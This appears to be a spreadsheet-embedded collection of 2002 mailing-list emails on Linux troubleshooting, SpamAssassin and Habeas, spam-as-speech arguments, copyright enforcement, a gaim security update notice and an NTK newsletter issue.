"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, August 26, 2002, at 09:59  AM, Tom wrote:&gt; Post MG in the 80's there were the colums by A K Dewdney that I dug a
&gt; bunch put into a book  called Turing Omnibus and then there is , of
&gt; course, all the goodens put out by Dougy Hoffstadler.A.K. Dewdney was the name I was looking for and the column was "Computer 
Recreations". Turns out he's still in Ontario and even has some homemade 
Sci-Fi online...http://www.csd.uwo.ca/faculty/akd/TALES/index.htmlVat Man
Programming Roger
The Homunculids
Alphie &amp; Omega
...Ross...
</t>
  </si>
  <si>
    <t>On 28 Aug 2002, Daniel Quinlan wrote:&gt; Dan Kohn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base.I have to agree here.  If Habeas is going to die just because SA does not
support it, that's a serious problem with the business model; but that is
nobody's problem but Habeas's.A possible solution is for Habeas's business model to include some kind of
incentive for users of SA to give it the benefit of the doubt.  I have yet
to think of an incentive that fits the bill ...On Thu, 29 Aug 2002, Justin Mason wrote:&gt;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5.On Thu, 29 Aug 2002, Michael Moncur wrote:&gt; But I agree that there needs to be more focus on eliminating rules that
&gt; frequently hit on newsletters. If any newsletters actually use the Habeas
&gt; mark, that will be one way to help.Newsletters won't use the mark.  Habeas is priced way too high -- a factor
of at least 20 over what the market will bear, IMO -- on a per-message
basis for most typical mailing lists (Lockergnome, say) to afford it.On Thu, 29 Aug 2002, Harold Hallikainen wrote:&gt; Habeus has come up with a very clever way to use existing law to battle
&gt; spam. It seems that at some point they could drop the licensing fee to
&gt; $1 or less and make all their income off suing the spammers for
&gt; copyright infringement.Sorry, that just can't work.If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 forced against their
will because their mail won't get through otherwise) to use the mark.Conversely, if there are enough spammers forging the mark for Habeas to
make all its income suing them, then the mark is useless for the purpose
for which it was designed.Either way it seems to me that, after maybe a couple of lawsuits against
real spammers and a lot of cease-and-desist letters to clueless Mom&amp;Pops,
then either (a) they're out of business, (b) they have to sell the rights
to use the mark to increasingly questionable senders, or (c) they've both
created and monopolized a market for "internet postage stamps" that
everybody has to pay them for.The latter would be quite a coup if they [*] could pull it off -- they do
absolutely nothing useful, unless you consider threatening people with
lawsuits useful, yet still collect a fee either directly or indirectly
from everyone on the internet -- effectively we'll be paying them for the
privilege of policing their trademark for them.  I don't believe they'll
ever get that far, but I don't particularly want to help them make it.[*] And I use the term "they" loosely, because the whole company could 
consist of one lawyer if it really got to that point.-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>Is there a way to look for a particular file or directory in 100's of zip
files??
Something like zgrep but for the filename instead of a wordThanks Justin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----Justin MacCarthy wrote:
| Is there a way to look for a particular file or directory in 100's of zip
| files??
| Something like zgrep but for the filename instead of a word
|
| Thanks Justin
|
|probably there are more elegant solutions, but if your zips are in one
directory you can do something likefor i in *.zip
do
if unzip -v $i | grep -q FILEYOUWANT
then
~  echo $i
fi
doneCheers,
Waider.
- --
waider@waider.ie / Yes, it /is/ very personal of me
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.orgiQEVAwUBPW5AmaHbXyzZsAb3AQH+qQgA1vnUjJUwGDa1yCRQd3vZAnhkCF0KDBBA
o9MYq4CUg9cEzKALkTyZu4eOprhL50ReaICUGLMMEc5htU9zove4F+CSuvbAKKHL
nx7xa6kk2V+LFnwS6hWpdQolCaT+4iGZZbdFwmyNAWb/IrEYB0R4gp05sitDOl5U
RRlzYSM3IUYDrYpDUuX7Ta7bLvSdC1PpWSqy/wXphNIh7Bs2+eB9ERAujuqi6vJo
MBichYb3f3teVCQUbxTcaMowjpmv/Xm3gdUlGrUFbpc2O7447Xi5uDfRexzzDoJT
HlFS6OO2ZqzcMrtUYEgsfyqpaF1WuD38JoFpa2TmSyX74bBhxS8ecw==
=KYCm
-----END PGP SIGNATURE-----
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>John P. Looney stated the following on Thu, Aug 29, 2002 at 03:31:11PM +0100 :
&gt;  I'm not sure what exactly is wrong with this, but I can't get a redhat
&gt; 7.1 box to use ttyS0 as a console.
&gt; 
&gt;  The relevant bits of /boot/grub/grub.conf are:
&gt; 
&gt; serial --unit=0 --speed=115200
&gt; terminal --timeout=2 console serial
&gt; title=linux
&gt;    root (hd0,4)
&gt;    kernel /boot/bzImage ro root=/dev/md0 console=ttyS0,115200n81
															     ^
That 1 is unneeded and is probably whats upsetting your kernelwe use "console=ttyS0,9600n8" but the 9600 is mainly cos we are a cisco
shop and its to keepo everyhting the same.Colin
-- 
"Design" is like a religion - too much of it makes you inflexibly and unpopular.
		Linus Torvalds-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
Not true on the choice part.After three weeks of me telling eircom that I did not in fact need nor want
their ?1800 worth of router and firewall
nor their onsite survey... for the uncapped service I actually managed to
get a 4 port modem (after asking for a 1 port modem) instead of ye olde
hardware router &amp; firewall and eircom onsite.I would have argued for the 1 port modem... (which I had asked for), but a
Director wanted the DSL up ... and fast....Still it only took me three weeks to get (almost) what I
wanted....................................
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.bbc.co.uk/radio1/alt/nireland/ni_team.shtml	first of a very short series.gerry
_______________________________________________
Crackmice mailing list
Crackmice@crackmice.com
http://crackmice.com/mailman/listinfo/crackmice</t>
  </si>
  <si>
    <t xml:space="preserve">
Gordon Rutter
gordon@rutter.freeserve.co.uk
Join the Fortean Book Reviews list at 
forteanbookreviews-subscribe@yahoogroups.com&gt; The latest potential pictures of Nessie - underwater - are at 
&gt; www.hi-lands.com------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>All,Is it just me or has there been a massive increase in the amount of email 
being falsely bounced around the place? I've already received email from a 
number of people I don't know, asking why I am sending them email. These 
can be explained by servers from Russia and elsewhere. Coupled with the 
false emails I received myself, it's really starting to annoy me. Am I the 
only one seeing an increase in recent weeks?Martin========================================================================
Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975" Our core product DÃ©iseditor Â©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"DÃ©iseditor Â© " Managing Your Information "
========================================================================_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t>I am wondering whether there's a way that I can use sitescooper and/or plucker
or some other free utility to convert word documents into something a bit
more palmos friendly?I don't have a Windows machine, so it becomes problematic to convert them;
I know that if this were not the case, in Word I could save them as some
other more friendly format.
-- 
Tcl'2002 Sept 16, 2002, Vancouver, BC http://www.tcl.tk/community/tcl2002/
Larry W. Virden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
  </si>
  <si>
    <t>Good Day!On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installed.&gt; I don't have a Windows machine, so it becomes problematic to convert them;
&gt; I know that if this were not the case, in Word I could save them as some
&gt; other more friendly format.	Great! ;)Mabuhay! barryg--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
  </si>
  <si>
    <t>use Perl Daily Headline MailerInstalling Perl 5.8.0 on Mac OS X 10.2
    posted by pudge on Thursday August 29, @15:03 (releases)
    http://use.perl.org/article.pl?sid=02/08/29/193225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</si>
  <si>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importer.)don't know which of these are better or worse than the other, but i
figure, "the more the merrier". ;-)&gt; You could also try openoffice and/or abiword if you
&gt; have x installed.AbiWord supports exporting to PalmDoc (.pdb) which is about as
PalmOS-friendly as you can get.  never tried/needed it, but it's listed
there in the "Save As" dialog box.Wine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nostalgia.&gt; &gt; I don't have a Windows machine, so it becomes problematic to convert them;
&gt; &gt; I know that if this were not the case, in Word I could save them as some
&gt; &gt; other more friendly format.i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others).anyways...
-- PLEASE REQUEST PERMISSION TO REDISTRIBUTE
   AUTHOR'S COMMENTS OR EMAIL ADDRESS.-------------------------------------------------------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</si>
  <si>
    <t xml:space="preserve">
 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as your personal slave for
         a day). They say there's some rule that would break, though.
         http://www.fipr.org/vacancy.html
- doesn't the Foundation use psychohistory for filling these positions?         For those of us who can't read the abbreviation EULA without 
         thinking of Martian fighting machines and their "deafening 
         howls... which roared like thunder", we're sorry to report 
         that this weekend's multimedia performance of Jeff Wayne's WAR 
         OF THE WORLDS has been postponed due to "health and safety 
         issues". The event was to feature computer graphics, 
         fireworks, "60ft-tall Martian fighting machines" wreaking 
         "havoc and destruction", and - most terrifyingly of all - the 
         possibility of a David Essex tribute singer performing with 
         Hawkwind, but UKP18 tickets for the Sat 2002-08-31 show at 
         Manchester's Heaton Park will still be valid at a range of new 
         venues next summer. Ironically, the Martians' original 
         invasion plans were similarly thwarted by health and safety 
         issues, "slain after all man's devices had failed by the 
         humblest creatures that God, in his wisdom, has put upon this 
         earth: bacteria. Minute, invisible, bacteria. For, directly 
         the invaders arrived and drank and fed, our microscopic allies 
         attacked them..."
         http://www.waroftheworlds.info/postpone.htm
                           - "...From that moment, they were doomed."
                                &gt;&gt; ANTI-NEWS &lt;&lt;
                             berating the obvious         moving on from PUERILE GOOGLE MISSPELLINGS, weird search-and-
         replace artefact: http://www.google.com/search?q=consideyellow ,
         Japanese fan sites for "plince", "steery dan", "def reppard" 
         et al, plus the 18,000 or more self-referential Usenet .sigs: 
         http://groups.google.com/groups?q=%22get+random+signatures%22 
         ...http://www.colocation-network.com/ "Zerodowntime" ad leads 
         to: http://www.ntk.net/2002/08/30/dohzero.gif ... slightly 
         harsh alt text: http://www.ntk.net/2002/08/30/dohover.gif ... 
         US military discovers the only "translator" those bastards 
         seem to understand: http://www.ntk.net/2002/08/30/dohgun.gif 
         ... scary blue men herald return of the bizarre BBC hacking 
         pics: http://news.bbc.co.uk/1/hi/1494091.stm ... reporter RYAN 
         DILLEY http://news.bbc.co.uk/1/hi/uk/2202552.stm pulls his 
         http://starwars.org.pl/galeria/e2/char/anakin/t001.jpg face 
         ... banjo maestro GEORGE FORMBY still alive, cooking, black: 
     http://www.readersheds.co.uk/readersheds/shop.cfm?WOSNAMES=Wosnames
         ... thanks guys, that ought to do it: http://www.eap.ca/ ... 
                                        &gt;&gt; EVENT QUEUE &lt;&lt;
                         goto's considered non-harmful         Controversially, we're all in favour of THE GUARDIAN GREAT 
         BRITISH BLOG COMPETITION (closing date next Fri 2002-09-06, 
         first prize UKP1000, entry free), in that any initiative that 
         encourages this notoriously primadonna-ish "community" to try 
         and engage with real-world notions of editorial quality surely 
         has to be a good thing. Our only disappointment is that The 
         Guardian appears to be focussing on the "best" of the entries, 
         when everyone knows the real fun is to be had cruising the 
         truly terrible examples that the genre has to offer, mentally 
         allocating points for "Most Depressing Recycling Of Daypop Top
         40 URLs", "Most Unsettling Revelations About Personal Life", 
         plus of course "Most Tedious Linking/Reciprocal Linking To Other 
         Bloggers In Absence Of Having Anything Interesting To Say". 
         http://www.guardian.co.uk/weblog/bestbritishblog/
                              - "A strange game, Professor Falken..."
       http://media.guardian.co.uk/newmedia/comment/0,7496,765161,00.html
                         - "...the only winning move is not to play."
                                &gt;&gt; TRACKING &lt;&lt;
               sufficiently advanced technology : the gathering          The respective trademark holders will hate this, but
          Windows really *is* like the Sun. You have this big hulking
          mass of concentrated power in the middle, with a few small
          orbiting utilities - like WinZip, and PuTTY, and VNC.
          Occasionally one will get a bit too close to the OS, and
          Microsoft will suck it down and turn it into fuel for the
          System. One such discrete satellite remains FILEZILLA, the
          still-necessary ftp gui client for Windows. Those who know
          it won't need the introduction, although they might
          appreciate the note that it's getting close to v2.0 time.
          For dogged WS_FTP users, though, it's got multiple
          downloads, auto-restart of interrupted 'loads, queuing, and
          sftp and Kerberos support. It's also GPL'd which makes it a
          nice bit of source for anyone wanting to grok Win32
          networking from something that works.
          http://filezilla.sf.net/
  - talking of trademarks, will the Godzilla people strike before MS?
                                &gt;&gt; MEMEPOOL &lt;&lt;
                ceci n'est pas une http://www.gagpipe.com/         (Not safe for work) next year's RED NOSE DAY looks more fun 
         than usual: http://www.threepillows.com/tour2.htm ... Mirrored 
         Disaster Recovery Suite - to go with mirrored bathroom etc?: 
       http://www.dovebid.com/Auctions/AuctionDetail.asp?AuctionID=1450
         ... and then the kid can take you to court for mental cruelty: 
         http://www.cnn.com/2002/TECH/ptech/08/27/turok.baby.reut/ ... 
         "funny" prefixes in front of "chalking" #n+1 - the actually 
         quite pragmatic: http://www.pinkbunny.co.uk/poochalking/ ... 
         no longer knowing - or caring - if these are prank AMAZON 
         reviews or not, for Potter's ever-popular "vibrating" broom: 
     http://www.amazon.com/exec/obidos/tg/stores/detail/-/toys/B00005NEBW/
         ... ditto "Use This Software At Your Own Risk" disclaimer for: 
         http://www.palmgear.com/software/showsoftware.cfm?prodID=41030 
         ... DAFFY DUCK appears in dock - accused of "dethpicable" 
         behaviour?: http://news.bbc.co.uk/1/hi/england/2223065.stm , 
         http://www.ananova.com/news/story/sm_659889.html ...
                                &gt;&gt; GEEK MEDIA &lt;&lt;
                                  get out less         TV&gt;&gt; celebrity cameo night tonight, with Brad Pitt in FRIENDS 
         (9pm, Fri, C4), Sydney Pollack in WILL AND GRACE (9.30pm, Fri, 
         C4), Dustin Hoffman in V GRAHAM NORTON (10.30pm, Fri, C4), and 
         a singing, dancing peanut in globalised trade documentary ALT-
         TV (7.30pm, Fri, C4)... the BBC have kept McEnroe and the 
         heart monitor, got rid of the live crocodiles in gimmicky 
         quizshow THE CHAIR (6.40pm, Sat, BBC1)... and a month of 
         "September 11th" specials kicks off with AVENGING TERROR (8pm, 
         Sat &amp; Sun, C4) - yet those responsible for BOWFINGER (9pm, 
         Sat, C4) and NOTTING HILL (9pm, Sun, C4) still remain 
         unpunished... John "The Last Seduction" Dahl's ROUNDERS (11pm, 
         Sat, BBC2) turns out to be about high-stakes poker, rather 
         than the girls' version of baseball... in the wake of DAVE 
         GORMAN'S IMPORTANT ASTROLOGY EXPERIMENT (10.40pm, Sun, BBC2), 
         how about a three-way challenge where he, Tony Hawks and Pete 
         McCarthy battle to come up with the most lucrative pointless 
         pretext for a book and TV show?... but we still have a soft 
         spot for Ron "Alien: Resurrection" Perlman liberal self-
         flagellation THE LAST SUPPER (11.20pm, Sun, C4)... 9/11 CLEAR 
         THE SKIES (9pm, Sun, BBC2) is a presumably uneventful account 
         of "how US air defence systems responded to the events of 
         September 11th"... inexplicably, the three finalists in THE 
         TARTIEST MEN IN BRITAIN (10.30pm, Mon, ITV) all come from 
         Leeds... Larry Clark takes a somewhat indirect approach to 
         conveying his safe-sex message in New York filth-fest KIDS 
         (1.15am, Tue, C4)... and the September 11th build-up continues 
         with HOW THE TWIN TOWERS COLLAPSED (8pm, Mon, C4), LET'S ROLL: 
         THE STORY OF FLIGHT 93 (10.30pm, Wed, ITV), plus THE MEYSSAN 
         CONSPIRACY (11.05pm, Tue, C4) - ie the French guy behind: 
       http://www.asile.org/citoyens/numero13/pentagone/erreurs_en.htm
         ... away from the polluted nightmare of modern living, a 
         family seek out a new way of life in Earth Summit tie-in A 
         LAND WORTH LOVING (7pm, Wed, BBC1)... which coincidentally 
         also forms the plot of this week's second Heather "Bowfinger" 
         Graham turkey, LOST IN SPACE (7.55pm, Wed, BBC1) - not to be 
         confused with the return of those annoying posh women in 
         WORLD'S WORST DRESSED (8pm, Wed, BBC2), who have at least shut 
         up about their always-doomed hideously purple e-commerce 
         site: http://news.bbc.co.uk/1/hi/business/712188.stm ...
         FILM&gt;&gt; the comic skills of Cameron Diaz, Christina Applegate 
         and Parker Posey combine in a cross between a teen smut comedy 
         and an episode of "Sex And The City", THE SWEETEST THING 
         ( http://www.screenit.com/movies/2002/the_sweetest_thing.html :
         As [Diaz] and [Applegate] drive down the road still dressed in 
         just their bras and underwear, [Applegate] drops her bottle of 
         fingernail polish. [Diaz] then goes over to get it, with 
         her panty-covered butt in the air and her head down toward 
         [Applegate]'s legs and crotch; [Selma Blair] [has] her mouth 
         stuck around a man's privates after apparently performing oral 
         sex on him)... Robin Williams plays a surprisingly convincing 
         Hannibal Lecter in morally complicated Alaskan Al Pacino 
         murder madness INSOMNIA ( http://www.cndb.com/ : You can see 
         [Crystal Lowe's] tits in autopsy photos and again - along with 
         bush - when she's seen on a autopsy table. Nice boobs but 
         she's dead)... it's Eddie Murphy, Randy Quaid, Jay "Jerry 
         Maguire" Mohr, John Cleese and Pam Grier - together at last! - 
         in blaxploitation sci-fi spoof THE ADVENTURES OF PLUTO NASH 
  ( http://www.screenit.com/movies/2002/the_adventures_of_pluto_nash.html :
         the woman then causes the image of [Rosario "Kids" Dawson] to 
         suddenly have much larger breasts and an exaggeratedly large 
         rear end)... all of which, shockingly, are an improvement on 
         John Woo interspersing lame battle scenes with agonising anti-
         racist philosophising in WW2 Navajo crypto clunker WINDTALKERS 
         ( http://www.capalert.com/capreports/windtalkers.htm : 
         gambling; beheading; brief partial nudity of a Japanese 
         soldier; I have no doubt that such gore is present in war but 
         must it be regurgitated in and as entertainment?)...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but bet we were banned first"
                    http://www.b3ta.com/newsletter/issue54/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</si>
  <si>
    <t xml:space="preserve">
//this function should print all numbers up to 100...void print_nums()
{
  int i;  for(i = 0; i &lt; 10l; i++) {
    printf("%d\n",i);
  }}</t>
  </si>
  <si>
    <t xml:space="preserve">(This list is sponsored by Ironclad Networks http://www.ironclad.net.au/)Hello!
Friday, August 30, 2002, 7:25:31 PM Bob Musser  wrote:[lost]BM&gt; I'd like to swap with someone also using Simple DNS to take
BM&gt; advantage of the trusted zone file transfer option.
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Are you speaking about limiting AXFR requests on IP address basis? If
yes, then virtually every BIND-equipped DNS server in the world will
be suitable for your needs.
-- Yours sincerely,Andrey G. Sergeev (AKA Andris)     http://www.andris.msk.ru/
--
To Unsubscribe: 
Sponsor &amp; Host: Ironclad Networks 
</t>
  </si>
  <si>
    <t>Severity: Security
Product: gaim
Keywords: gaim hyperlink manual
References: 
  CAN-2002-0989 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0989
  Gaim Changelog
    http://gaim.sourceforge.net/ChangeLogGaim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window.Please download Gaim 0.59.1 or later using Red Carpet. You may also
obtain this update from the Ximian FTP site.Debian Potato
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim_0.59.1-1.ximian.2_i386.deb
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-common_0.59.1-1.ximian.2_i386.deb
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-gnome_0.59.1-1.ximian.2_i386.debMandrake 8.0
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-80-i586/gaim-0.59.1-1.ximian.2.i586.rpmMandrake 8.1
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-81-i586/gaim-0.59.1-1.ximian.2.i586.rpmMandrake 8.2
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-82-i586/gaim-0.59.1-1.ximian.2.i586.rpmRedhat 6.2
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmRedhat 7.0
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmRedhat 7.1
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmRedhat 7.2
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmRedhat 7.3
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmSolaris 7/8
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-0.59.1-2.ximian.1.sparc.rpmSuSE 7.1
ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmSuSE 7.2
ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmSuSE 7.3
ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmSuSE 8.0
ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-0.59.1-1.ximian.2.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpmYellowdog 2.0
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpmYellowdog 2.1
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpmYellowdog 2.2
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpm_______________________________________________
updates maillist  -  updates@ximian.com
To unsubscribe from this list, or to change your subscription options, follow the link below:
http://lists.ximian.com/mailman/listinfo/updates</t>
  </si>
  <si>
    <t>I am trying to rebuild the recently posted ALSA driver package for my 
kernel.  Although I run Red Hat 7.3, I am not using a Red Hat kernel 
package: my kernel is lovingly downloaded, configured, and built by 
hand.  Call me old fashioned.Sadly, the RPM rebuild fails part way through:     % rpm --rebuild alsa-driver-0.9.0rc3-fr6.src.rpm     gcc -DALSA_BUILD -D__KERNEL__ -DMODULE=1 \
     -I/usr/src/redhat/BUILD/alsa-driver-0.9.0rc3/include \
     -I/lib/modules/2.4.18/build/include -O2 \
     -mpreferred-stack-boundary=2 -march=i686 -DLINUX -Wall \
     -Wstrict-prototypes -fomit-frame-pointer -pipe   -DEXPORT_SYMTAB \
     -c sound.c     sound.c:41: `snd_hack_usb_set_interface' undeclared here (not in a \
     function)     sound.c:41: initializer element is not constant     sound.c:41: (near initialization for \
     __ksymtab_snd_hack_usb_set_interface.value')     make[1]: *** [sound.o] Error 1The line in question looks like this:	/* USB workaround */
	#if LINUX_VERSION_CODE &lt; KERNEL_VERSION(2, 5, 24)
	#if defined(CONFIG_SND_USB_AUDIO) || \
	defined(CONFIG_SND_USB_AUDIO_MODULE) || \
	defined(CONFIG_SND_USB_MIDI) || \
	defined(CONFIG_SND_USB_MIDI_MODULE)
-41-&gt; 
EXPORT_SYMBOL(snd_hack_usb_set_interface);
	#endif
	#endifAny suggestions?
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Fri, 23 Aug 2002, Robert Harley wrote:--]Next time I hear a joke, I promise not to laugh until I have checked
--]out primary sources for confirmation in triplicate, OK?
Oh please. Walking sideways like that is bad for your shoes.Though it is kinda cute when you get all reasonomaticbang banghave a nice day.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Dan Brickley wrote:
&gt; Except that thanks to the magic of spam, it's usually some else's localeyeah, physical mail makes more sense for physical locales.&gt; There are better technical solutions to privacy
&gt; protection than sending a copy of the same message to everyone on the
&gt; Internet, so the recipients can't be blamed for reading it.Such as?Anything equivalent will be spam, just not email spam.  Dump entry IPs for
an anonymizing network onto a public bulletin board that's used for other
purposes -- still spam.  Etc etc.I'm not arguing against other solutions, I'm arguing that spam is speech.  
If you let governments ban it, you're giving them the power to choose who 
gets to speak.- Lucashttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
me:
&gt; &gt;Spam is *the* tool for dissident news, since the fact that it's unsolicited 
&gt; &gt;means that recipients can't be blamed for being on a mailing list.
&gt; Russell Turpin:
&gt; That depends on how the list is collected, or
&gt; even on what the senders say about how the list
&gt; is collected. Better to just put it on a website,
&gt; and that way it can be surfed anonymously. AND
&gt; it doesn't clutter my inbox.It doesn't work that way.  A website is opt-in, spam is no-opt.  If you
visit a samizdat site you can get in trouble.  If you get samizdat spam,
the worst that can be said is that you might have read it.  And as long as
the mailers send to individuals who clearly didn't opt-in, like party
officials, then other recipients can't get in trouble for requesting the
mail.  Plus, it's much harder to block spam than web sites.But this shouldn't come as a surprize.  Spam is speech.  It may be sleazy, 
but so what.- Lucas
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
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GPL.Some notes from other places....&gt;&gt;From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Sigma codec is pretty much a copy of the XviD codec, but all the
copyright notices of the original developers have been removed and
replaced. This does not only violate the GPL but copyright laws - you
can't just take a program, change a few lines and change the copyright
statements, you only have copyright protection for the parts you wrote on
your own. And related to this the Sigma codec also contains code taken
from the OpenDivX project, the files were outfitted with 2 different
copyright notices which is quite funny."[1] http://www.xvid.org/
[2] http://www.sigmadesigns.com
[3] http://www.doom9.org/http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt; Russell Turpin:
&gt; &gt; That depends on how the list is collected, or
&gt; &gt; even on what the senders say about how the list
&gt; &gt; is collected. Senders should vary the recipient list to include non-targets, like party
officials, and to exclude targets enough to give them plausible
deniability.- Lucas
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Fri, 23 Aug 2002, Tom wrote:--]
--]XviD [1] is a project to make GPL divx codecs. Sigma Designs [1] is a
Sorry, Sigma Designs should be the [2] not the [1]
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>from http://www.arstechnica.com/"There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holder.The statute of limitations:
507. Limitations on actions(a) Criminal Proceedings.--No criminal proceeding shall be maintained
under the provisions of this title unless it is commenced within five
years after the cause of action arose.(b) Civil Actions.--No civil action shall be maintained under the
provisions of this title unless it is commenced within three years after
the claim accrued.The penalties are too extensive to list here, but they can be found in
Section 2319: Criminal infringement of a copyright. In general, first-time
criminal offenses will carry a maximum prison sentence of 1 year.I'm still not sure where the DOJ would start in choosing people to
prosecute because of the aforementioned "schooling" effect, but my guess
would be that, just like speeding, primarily the most prominent
individuals who operate large servers or transfer the most data will be
targeted in order to discourage more recreational file sharers. Thanks to
MonaLisaOverdrive for pointing out this story.
"[1] http://news.com.com/2100-1023-954591.html?tag=fd_top
[2] http://www.usdoj.gov/criminal/cybercrime/17-18red.htmhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Fri, 23 Aug 2002, Tom wrote:&gt; from http://www.arstechnica.com/
&gt;
&gt; "There has mostly been talk thus far and little action, but the
&gt; Department of Justice says it may be ready to file criminal lawsuits
&gt; against individuals [1] who distribute or receive unauthorized
&gt; copyrighted material over the Internet.And yet STILL noone is out there creating _public domain_ content. Is there
even one person out there can can even begin to talk without being a
complete hypocrite? And no the "open source" people cant talk either, the
GPL aint even close. I know I cant talk.If the creator didnt say you could have it without paying, it's theft, so
simple, hell that's even in all the major holy books.Fair use needs to be clarified a bit and then I hope they start locking
people up. How else do i ever have hope of finding a job working for someone
that makes things people are supposed to ... *drumroll* pay for.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Reza B'Far (eBuilt) wrote:
&gt; problems.... Why do most computer scientists insist on solving the same
&gt; problems over and over again when there are some many more important and
&gt; interesting problems (high level) to be solved ?????Amen!Doing it in an (unecessarily) harder way does NOT make you more of a man
(or less of a kiddie).- Joe</t>
  </si>
  <si>
    <t>If I have any RPMS inhttp://www.dudex.net/rpms/that could be useful to some one with a real apt repository or someone who wants to
maintain a package, be it known I am not selfish :)I found stuff I thought would later get popular so I would not have to maintain the
RPMs for them after they hit the big time. Gnump3d is an exapmple of this.So if anyone is psyched, go for it. If so, let me know so I can get the RPMs from
you in the future.--
That's "angle" as in geometry._______________________________________________
